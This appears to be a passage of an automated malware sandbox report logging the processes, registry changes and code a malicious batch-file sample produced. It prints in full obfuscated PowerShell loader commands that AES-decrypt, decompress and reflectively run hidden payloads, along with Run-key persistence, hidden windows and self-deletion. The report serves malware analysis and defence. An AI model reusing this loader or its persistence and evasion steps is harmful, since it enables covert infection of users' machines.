[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+'S'+''+[Char](105)+''+'g'+','+'P'+'u'+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$KEMhNhDQCLRUNV).SetImplementationFlags(''+'R'+''+[Char](117)+'n'+'t'+''+'i'+''+[Char](109)+''+'e'+''+[Char](44)+'M'+'a'+''+'n'+'ag'+'e'+''+[Char](100)+'');$khFifhQytpa.DefineMethod(''+[Char](73)+'n'+[Char](118)+''+'o'+''+'k'+''+[Char](101)+'',''+[Char](80)+'u'+[Char](98)+'l'+'i'+''+[Char](99)+''+[Char](44)+'H'+'i'+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+'y'+''+[Char](83)+''+'i'+''+[Char](103)+',N'+'e'+''+[Char](119)+'S'+[Char](108)+''+[Char](111)+''+[Char](116)+''+[Char](44)+''+'V'+''+[Char](105)+'r'+[Char](116)+'ua'+[Char](108)+'',$HGdpxLKyUQ,$KEMhNhDQCLRUNV).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'n'+[Char](116)+'i'+'m'+''+[Char](101)+''+','+''+[Char](77)+''+[Char](97)+''+'n'+'a'+'g'+''+[Char](101)+''+[Char](100)+'');Write-Output $khFifhQytpa.CreateType();}$KRrkXMMJHQAWa=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+'m'+''+[Char](46)+''+[Char](100)+'ll')}).GetType(''+'M'+''+'i'+''+'c'+''+'r'+'o'+[Char](115)+''+'o'+''+[Char](102)+''+[Char](116)+'.'+[Char](87)+''+[Char](105)+''+[Char](110)+''+[Char](51)+''+[Char](50)+'.Un'+[Char](115)+'a'+'f'+''+'e'+'N'+[Char](97)+''+[Char](116)+''+'i'+''+[Char](118)+''+[Char](101)+''+[Char](77)+''+[Char](101)+''+'t'+''+[Char](104)+''+'o'+''+'d'+''+'s'+'');$doZKqFPbZxNLSh=$KRrkXMMJHQAW
Source: C:\Windows\System32\cmd.exeProcess created: cmd.exe /c echo function nTIwb($oVJGU){ $dmvwb=[System.Security.Cryptography.Aes]::Create(); $dmvwb.Mode=[System.Security.Cryptography.CipherMode]::CBC; $dmvwb.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $dmvwb.Key=[System.Convert]::FromBase64String('q/epIFuUiTeZPvuXMOrJUZKEDTokijbasPqPVgeuzIY='); $dmvwb.IV=[System.Convert]::FromBase64String('2eFTLv8XY+wg1Xp7cznzrQ=='); $bbzAD=$dmvwb.CreateDecryptor(); $hLXQZ=$bbzAD.TransformFinalBlock($oVJGU, 0, $oVJGU.Length); $bbzAD.Dispose(); $dmvwb.Dispose(); $hLXQZ;}function hCkUZ($oVJGU){ Invoke-Expression '$VRbTd=New-Object oniSoniyonisonitonieonimoni.oniIoniOoni.oniMonieonimonioonironiyStonironieoniamoni(,$oVJGU);'.Replace('oni', ''); Invoke-Expression '$GbZBJ=New-Object oniSoniyonisonitonieonim.oniIoniOoni.MonieonimonioonironiyoniSonitonironieoniaonimoni;'.Replace('oni', ''); Invoke-Expression '$qvkjb=New-Object Soniyonisonitonieonimoni.oniIoniOoni.oniConioonimoniponironieonissoniiooninoni.GoniZioniponiSonitonironieoniaonimoni($VRbTd, [oniIoniOoni.oniConioonimoniponironieonisonisoniioniooninoni.oniConioonimoniponironieonisonisoniioniooninoniMonioonidonieoni]::Donieconiomoniproniesonis);'.Replace('oni', ''); $qvkjb.CopyTo($GbZBJ); $qvkjb.Dispose(); $VRbTd.Dispose(); $GbZBJ.Dispose(); $GbZBJ.ToArray();}function uFDAH($oVJGU,$FJSeL){ Invoke-Expression '$qHIdZ=oni[oniSoniyonisonitonieonimoni.oniRonieonifonilonieoniconitoniioniooninoni.oniAonisonisonieonimoniboniloniyoni]oni::oniLoniooniaonidoni([byte[]]$oVJGU);'.Replace('oni', ''); Invoke-Expression '$eNoQZ=$qHIdZ.oniEoninonitonironiyoniPoniooniioninonitoni;'.Replace('oni', ''); Invoke-Expression '$eNoQZ.oniIoninonivonioonikonieoni(oni$oninoniuoniloniloni, $FJSeL)oni;'.Replace('oni', '');}$DNWGy = 'C:\Users\user\Desktop\Q5N7WOpk8J.bat';$host.UI.RawUI.WindowTitle = $DNWGy;$YMRTG=[System.IO.File]::ReadAllText($DNWGy).Split([Environment]::NewLine);foreach ($kGLHr in $YMRTG) { if ($kGLHr.StartsWith(':: ')) { $qObbT=$kGLHr.Substring(3); break; }}$UCMwf=[string[]]$qObbT.Split('\');Invoke-Expression '$oOAsD=hCkUZ (nTIwb (oni[oniConiooninonivonieonironitoni]oni:oni:oniFonironioonimoniBoniaonisonieoni6oni4oniSonitonironiioninonigoni($UCMwf[0])));'.Replace('oni', '');Invoke-Expression '$OwBFa=hCkUZ (nTIwb (oni[oniConiooninonivonieonironitoni]oni:oni:oniFonironioonimoniBoniaonisonieoni6oni4oniSonitonironiioninonigoni($UCMwf[1])));'.Replace('oni', '');uFDAH $oOAsD $null;uFDAH $OwBFa (,[string[]] (''));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$cnt-onimai2\$cnt-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exeProcess created: cmd.exe /c echo function nTIwb($oVJGU){ $dmvwb=[System.Security.Cryptography.Aes]::Create(); $dmvwb.Mode=[System.Security.Cryptography.CipherMode]::CBC; $dmvwb.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $dmvwb.Key=[System.Convert]::FromBase64String('q/epIFuUiTeZPvuXMOrJUZKEDTokijbasPqPVgeuzIY='); $dmvwb.IV=[System.Convert]::FromBase64String('2eFTLv8XY+wg1Xp7cznzrQ=='); $bbzAD=$dmvwb.CreateDecryptor(); $hLXQZ=$bbzAD.TransformFinalBlock($oVJGU, 0, $oVJGU.Length); $bbzAD.Dispose(); $dmvwb.Dispose(); $hLXQZ;}function hCkUZ($oVJGU){ Invoke-Expression '$VRbTd=New-Object oniSoniyonisonitonieonimoni.oniIoniOoni.oniMonieonimonioonironiyStonironieoniamoni(,$oVJGU);'.Replace('oni', ''); Invoke-Expression '$GbZBJ=New-Object oniSoniyonisonitonieonim.oniIoniOoni.MonieonimonioonironiyoniSonitonironieoniaonimoni;'.Replace('oni', ''); Invoke-Expression '$qvkjb=New-Object Soniyonisonitonieonimoni.oniIoniOoni.oniConioonimoniponironieonissoniiooninoni.GoniZioniponiSonitonironieoniaonimoni($VRbTd, [oniIoniOoni.oniConioonimoniponironieonisonisoniioniooninoni.oniConioonimoniponironieonisonisoniioniooninoniMonioonidonieoni]::Donieconiomoniproniesonis);'.Replace('oni', ''); $qvkjb.CopyTo($GbZBJ); $qvkjb.Dispose(); $VRbTd.Dispose(); $GbZBJ.Dispose(); $GbZBJ.ToArray();}function uFDAH($oVJGU,$FJSeL){ Invoke-Expression '$qHIdZ=oni[oniSoniyonisonitonieonimoni.oniRonieonifonilonieoniconitoniioniooninoni.oniAonisonisonieonimoniboniloniyoni]oni::oniLoniooniaonidoni([byte[]]$oVJGU);'.Replace('oni', ''); Invoke-Expression '$eNoQZ=$qHIdZ.oniEoninonitonironiyoniPoniooniioninonitoni;'.Replace('oni', ''); Invoke-Expression '$eNoQZ.oniIoninonivonioonikonieoni(oni$oninoniuoniloniloni, $FJSeL)oni;'.Replace('oni', '');}$DNWGy = 'C:\Windows\$cnt-onimai2\$cnt-CO2.bat';$host.UI.RawUI.WindowTitle = $DNWGy;$YMRTG=[System.IO.File]::ReadAllText($DNWGy).Split([Environment]::NewLine);foreach ($kGLHr in $YMRTG) { if ($kGLHr.StartsWith(':: ')) { $qObbT=$kGLHr.Substring(3); break; }}$UCMwf=[string[]]$qObbT.Split('\');Invoke-Expression '$oOAsD=hCkUZ (nTIwb (oni[oniConiooninonivonieonironitoni]oni:oni:oniFonironioonimoniBoniaonisonieoni6oni4oniSonitonironiioninonigoni($UCMwf[0])));'.Replace('oni', '');Invoke-Expression '$OwBFa=hCkUZ (nTIwb (oni[oniConiooninonivonieonironitoni]oni:oni:oniFonironioonimoniBoniaonisonieoni6oni4oniSonitonironiioninonigoni($UCMwf[1])));'.Replace('oni', '');uFDAH $oOAsD $null;uFDAH $OwBFa (,[string[]] (''));
Source: C:\Windows\System32\cmd.exeProcess created: cmd.exe /c echo function nTIwb($oVJGU){ $dmvwb=[System.Security.Cryptography.Aes]::Create(); $dmvwb.Mode=[System.Security.Cryptography.CipherMode]::CBC; $dmvwb.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $dmvwb.Key=[System.Convert]::FromBase64String('q/epIFuUiTeZPvuXMOrJUZKEDTokijbasPqPVgeuzIY='); $dmvwb.IV=[System.Convert]::FromBase64String('2eFTLv8XY+wg1Xp7cznzrQ=='); $bbzAD=$dmvwb.CreateDecryptor(); $hLXQZ=$bbzAD.TransformFinalBlock($oVJGU, 0, $oVJGU.Length); $bbzAD.Dispose(); $dmvwb.Dispose(); $hLXQZ;}function hCkUZ($oVJGU){ Invoke-Expression '$VRbTd=New-Object oniSoniyonisonitonieonimoni.oniIoniOoni.oniMonieonimonioonironiyStonironieoniamoni(,$oVJGU);'.Replace('oni', ''); Invoke-Expression '$GbZBJ=New-Object oniSoniyonisonitonieonim.oniIoniOoni.MonieonimonioonironiyoniSonitonironieoniaonimoni;'.Replace('oni', ''); Invoke-Expression '$qvkjb=New-Object Soniyonisonitonieonimoni.oniIoniOoni.oniConioonimoniponironieonissoniiooninoni.GoniZioniponiSonitonironieoniaonimoni($VRbTd, [oniIoniOoni.oniConioonimoniponironieonisonisoniioniooninoni.oniConioonimoniponironieonisonisoniioniooninoniMonioonidonieoni]::Donieconiomoniproniesonis);'.Replace('oni', ''); $qvkjb.CopyTo($GbZBJ); $qvkjb.Dispose(); $VRbTd.Dispose(); $GbZBJ.Dispose(); $GbZBJ.ToArray();}function uFDAH($oVJGU,$FJSeL){ Invoke-Expression '$qHIdZ=oni[oniSoniyonisonitonieonimoni.oniRonieonifonilonieoniconitoniioniooninoni.oniAonisonisonieonimoniboniloniyoni]oni::oniLoniooniaonidoni([byte[]]$oVJGU);'.Replace('oni', ''); Invoke-Expression '$eNoQZ=$qHIdZ.oniEoninonitonironiyoniPoniooniioninonitoni;'.Replace('oni', ''); Invoke-Expression '$eNoQZ.oniIoninonivonioonikonieoni(oni$oninoniuoniloniloni, $FJSeL)oni;'.Replace('oni', '');}$DNWGy = 'C:\Users\user\Desktop\Q5N7WOpk8J.bat';$host.UI.RawUI.WindowTitle = $DNWGy;$YMRTG=[System.IO.File]::ReadAllText($DNWGy).Split([Environment]::NewLine);foreach ($kGLHr in $YMRTG) { if ($kGLHr.StartsWith(':: ')) { $qObbT=$kGLHr.Substring(3); break; }}$UCMwf=[string[]]$qObbT.Split('\');Invoke-Expression '$oOAsD=hCkUZ (nTIwb (oni[oniConiooninonivonieonironitoni]oni:oni:oniFonironioonimoniBoniaonisonieoni6oni4oniSonitonironiioninonigoni($UCMwf[0])));'.Replace('oni', '');Invoke-Expression '$OwBFa=hCkUZ (nTIwb (oni[oniConiooninonivonieonironitoni]oni:oni:oniFonironioonimoniBoniaonisonieoni6oni4oniSonitonironiioninonigoni($UCMwf[1])));'.Replace('oni', '');uFDAH $oOAsD $null;uFDAH $OwBFa (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$cnt-onimai2\$cnt-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle HiddenJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: cmd.exe /c echo function nTIwb($oVJGU){ $dmvwb=[System.Security.Cryptography.Aes]::Create(); $dmvwb.Mode=[System.Security.Cryptography.CipherMode]::CBC; $dmvwb.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $dmvwb.Key=[System.Convert]::FromBase64String('q/epIFuUiTeZPvuXMOrJUZKEDTokijbasPqPVgeuzIY='); $dmvwb.IV=[System.Convert]::FromBase64String('2eFTLv8XY+wg1Xp7cznzrQ=='); $bbzAD=$dmvwb.CreateDecryptor(); $hLXQZ=$bbzAD.TransformFinalBlock($oVJGU, 0, $oVJGU.Length); $bbzAD.Dispose(); $dmvwb.Dispose(); $hLXQZ;}function hCkUZ($oVJGU){ Invoke-Expression '$VRbTd=New-Object oniSoniyonisonitonieonimoni.oniIoniOoni.oniMonieonimonioonironiyStonironieoniamoni(,$oVJGU);'.Replace('oni', ''); Invoke-Expression '$GbZBJ=New-Object oniSoniyonisonitonieonim.oniIoniOoni.MonieonimonioonironiyoniSonitonironieoniaonimoni;'.Replace('oni', ''); Invoke-Expression '$qvkjb=New-Object Soniyonisonitonieonimoni.oniIoniOoni.oniConioonimoniponironieonissoniiooninoni.GoniZioniponiSonitonironieoniaonimoni($VRbTd, [oniIoniOoni.oniConioonimoniponironieonisonisoniioniooninoni.oniConioonimoniponironieonisonisoniioniooninoniMonioonidonieoni]::Donieconiomoniproniesonis);'.Replace('oni', ''); $qvkjb.CopyTo($GbZBJ); $qvkjb.Dispose(); $VRbTd.Dispose(); $GbZBJ.Dispose(); $GbZBJ.ToArray();}function uFDAH($oVJGU,$FJSeL){ Invoke-Expression '$qHIdZ=oni[oniSoniyonisonitonieonimoni.oniRonieonifonilonieoniconitoniioniooninoni.oniAonisonisonieonimoniboniloniyoni]oni::oniLoniooniaonidoni([byte[]]$oVJGU);'.Replace('oni', ''); Invoke-Expression '$eNoQZ=$qHIdZ.oniEoninonitonironiyoniPoniooniioninonitoni;'.Replace('oni', ''); Invoke-Expression '$eNoQZ.oniIoninonivonioonikonieoni(oni$oninoniuoniloniloni, $FJSeL)oni;'.Replace('oni', '');}$DNWGy = 'C:\Windows\$cnt-onimai2\$cnt-CO2.bat';$host.UI.RawUI.WindowTitle = $DNWGy;$YMRTG=[System.IO.File]::ReadAllText($DNWGy).Split([Environment]::NewLine);foreach ($kGLHr in $YMRTG) { if ($kGLHr.StartsWith(':: ')) { $qObbT=$kGLHr.Substring(3); break; }}$UCMwf=[string[]]$qObbT.Split('\');Invoke-Expression '$oOAsD=hCkUZ (nTIwb (oni[oniConiooninonivonieonironitoni]oni:oni:oniFonironioonimoniBoniaonisonieoni6oni4oniSonitonironiioninonigoni($UCMwf[0])));'.Replace('oni', '');Invoke-Expression '$OwBFa=hCkUZ (nTIwb (oni[oniConiooninonivonieonironitoni]oni:oni:oniFonironioonimoniBoniaonisonieoni6oni4oniSonitonironiioninonigoni($UCMwf[1])));'.Replace('oni', '');uFDAH $oOAsD $null;uFDAH $OwBFa (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:oxbNdIdJMSmp{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$KEMhNhDQCLRUNV,[Parameter(Position=1)][Type]$HGdpxLKyUQ)$khFifhQytpa=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+'f'+''+[Char](108)+''+'e'+'c'+'t'+'e'+'d'+''+[Char](68)+''+[Char](101)+'l'+[Char](101)+''+'g'+''+[Char](97)+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+'n'+''+'M'+'e'+[Char](109)+''+'o'+''+[Char](114)+''+'y'+''+'M'+''+[Char](111)+''+'d'+''+[Char](117)+'le',$False).DefineType(''+[Char](77)+'yD'+'e'+''+'l'+''+[Char](101)+''+'g'+'a'+[Char](116)+''+[Char](101)+''+'T'+''+'y'+''+'p'+''+'e'+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+'P'+[Char](117)+''+'b'+''+'l'+''+[Char](105)+''+'c'+''+','+''+[Char](83)+'e'+[Char](97)+'l'+'e'+''+[Char](100)+''+','+''+[Char](65)+''+[Char](110)+''+'s'+''+'i'+'C'+[Char](108)+'a'+[Char](115)+''+'s'+''+','+''+'A'+''+[Char](117)+'t'+[Char](111)+'Cla'+[Char](115)+''+'s'+'',[MulticastDelegate]);$khFifhQytpa.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+'p'+[Char](101)+'c'+[Char](105)+'al'+[Char](78)+''+'a'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+'S'+''+[Char](105)+''+'g'+','+'P'+'u'+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$KEMhNhDQCLRUNV).SetImplementationFlags(''+'R'+''+[Char](117)+'n'+'t'+''+'i'+''+[Char](109)+''+'e'+''+[Char](44)+'M'+'a'+''+'n'+'ag'+'e'+''+[Char](100)+'');$khFifhQytpa.DefineMethod(''+[Char](73)+'n'+[Char](118)+''+'o'+''+'k'+''+[Char](101)+'',''+[Char](80)+'u'+[Char](98)+'l'+'i'+''+[Char](99)+''+[Char](44)+'H'+'i'+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+'y'+''+[Char](83)+''+'i'+''+[Char](103)+',N'+'e'+''+[Char](119)+'S'+[Char](108)+''+[Char](111)+''+[Char](116)+''+[Char](44)+''+'V'+''+[Char](105)+'r'+[Char](116)+'ua'+[Char](108)+'',$HGdpxLKyUQ,$KEMhNhDQCLRUNV).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'n'+[Char](116)+'i'+'m'+''+[Char](101)+''+','+''+[Char](77)+''+[Char](97)+''+'n'+'a'+'g'+''+[Char](101)+''+[Char](100)+'');Write-Output $khFifhQytpa.CreateType();}$KRrkXMMJHQAWa=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+'m'+''+[Char](46)+''+[Char](100)+'ll')}).GetType(''+'M'+''+'i'+''+'c'+''+'r'+'o'+[Char](115)+''+'o'+''+[Char](102)+''+[Char](116)+'.'+[Char](87)+''+[Char](105)+''+[Char](110)+''+[Char](51)+''+[Char](50)+'.Un'+[Char](115)+'a'+'f'+''+'e'+'N'+[Char](97)+''+[Char](116)+''+'i'+''+[Char](118)+''+[Char](101)+''+[Char](77)+''+[Char](101)+''+'t'+''+[Char](104)+''+'o'+''+'d'+''+'s'+'');$doZKqFPbZxNLSh=$KRrkXMMJHQAW
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle HiddenJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle HiddenJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle HiddenJump to behavior
Source: C:\Windows\System32\cmd.exeCode function: 21_2_000001F1197D1E3C LoadLibraryA,GetProcAddress,SleepEx,21_2_000001F1197D1E3C
Source: C:\Windows\System32\cmd.exeCode function: 21_3_000001F1197AA7DD push rcx; retf 003Fh21_3_000001F1197AA7DE
Source: C:\Windows\System32\conhost.exeCode function: 22_3_00000166BBF8A7DD push rcx; retf 003Fh22_3_00000166BBF8A7DE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FFAAC7E6DBC pushad ; iretd 34_2_00007FFAAC7E6DBD
Source: C:\Windows\System32\dllhost.exeCode function: 37_3_00000279A925A7DD push rcx; retf 003Fh37_3_00000279A925A7DE
Source: C:\Windows\System32\winlogon.exeCode function: 38_3_000001CA7D1CA7DD push rcx; retf 003Fh38_3_000001CA7D1CA7DE
Source: C:\Windows\System32\lsass.exeCode function: 39_3_0000017D2DD3A7DD push rcx; retf 003Fh39_3_0000017D2DD3A7DE

Boot Survival

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows_Log
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows_Log cmd.exe /c echo Start-Process -FilePath 'C:\Windows\$cnt-onimai2\$cnt-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$cnt-CNT1" /F
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\System32\Tasks\$cnt-sYvLLQ2I
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows_Log
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows_Log

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile deleted: c:\users\user\desktop\q5n7wopk8j.batJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE $cnt-stagerJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
